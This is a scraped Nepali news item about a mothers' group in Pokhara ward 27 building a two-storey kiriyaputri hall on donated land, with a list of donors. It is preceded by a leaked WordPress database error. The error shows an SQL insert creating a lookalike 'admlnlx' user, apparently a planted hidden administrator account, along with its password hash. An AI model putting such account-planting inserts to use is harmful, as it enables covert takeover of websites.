WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B52Exjnbrw0PysMB18/5nBYoqlZBJE/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-29 12:56:57', '', 'admlnlx', 'admlnlx')
पोखरा, पुस ११ –
पोखरा उपमहानगरपालिका–२७ देवीस्थानमा किरियापुत्री भवन निर्माण गरिने भएको छ ।
स्थानीय देवीस्थान आमा समूहको सक्रियतामा करिब रु १५ लाखको लागतमा दुईतले सो भवन निर्माण गर्न लागिएको हो ।
भवन निर्माणका लागि समाजसेवी झपटबहादुर भण्डारीले झन्डै रु १२ लाख मूल्य पर्ने दुई आना दुई दाम जग्गा निःशुल्क दिनुभएको थियो ।
निर्माणाधिन सो भवन जग्गादाता भण्डारीले नै आज यहाँ शिलान्यास गर्नुभयो ।
भवन निर्माणका लागि आमा समूहका सल्लाहकार श्यामबहादुर खड्काले रु २५ हजार १५५, रामचन्द्र तिमिल्सिनाले रु १० हजार ६४२ र आमा समूहका सदस्यहरु सीता तिमिल्सिनाले रु १५ हजार १५५, गीता कार्की र सावित्री सापकोटाले जनही रु ११ हजार १११ सहयोग गर्नुभएको थियो । – रासस